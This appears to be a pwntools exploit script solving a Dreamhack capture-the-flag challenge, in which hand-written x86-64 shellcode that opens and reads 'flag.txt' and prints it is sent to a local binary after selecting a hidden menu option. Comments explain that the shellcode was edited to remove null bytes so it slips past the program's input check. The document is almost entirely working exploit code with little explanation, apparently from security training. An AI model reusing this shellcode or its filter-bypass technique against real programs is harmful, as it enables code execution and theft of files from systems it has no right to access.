from pwn import *

# https://learn.dreamhack.io/50#4
# support tool: https://defuse.ca/online-x86-assembler.htm#disassembly
# open read wrtie shellcode but edited to bypass the check func (no \x00 byte int the shellcode)

p = process("./shellorantSHELLORANT")

shellcode = b"\x48\x31\xC0\x50\x48\xB8\x66\x6C\x61\x67\x2E\x74\x78\x74\x50\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x48\x31\xC0\x48\x83\xC0\x02\x0F\x05\x48\x89\xC7\x48\x31\xF6\x48\x81\xC6\x60\x70\x33\x01\x48\x31\xD2\x48\x83\xC2\x30\x48\x31\xC0\x0F\x05\x48\x31\xFF\x48\x83\xC7\x01\x48\x31\xC0\x48\x83\xC0\x01\x0F\x05"
p.sendlineafter(b"Choice: ", b"1337")
p.sendafter(b"stdin.\n", shellcode)
print(len(shellcode))
p.interactive()
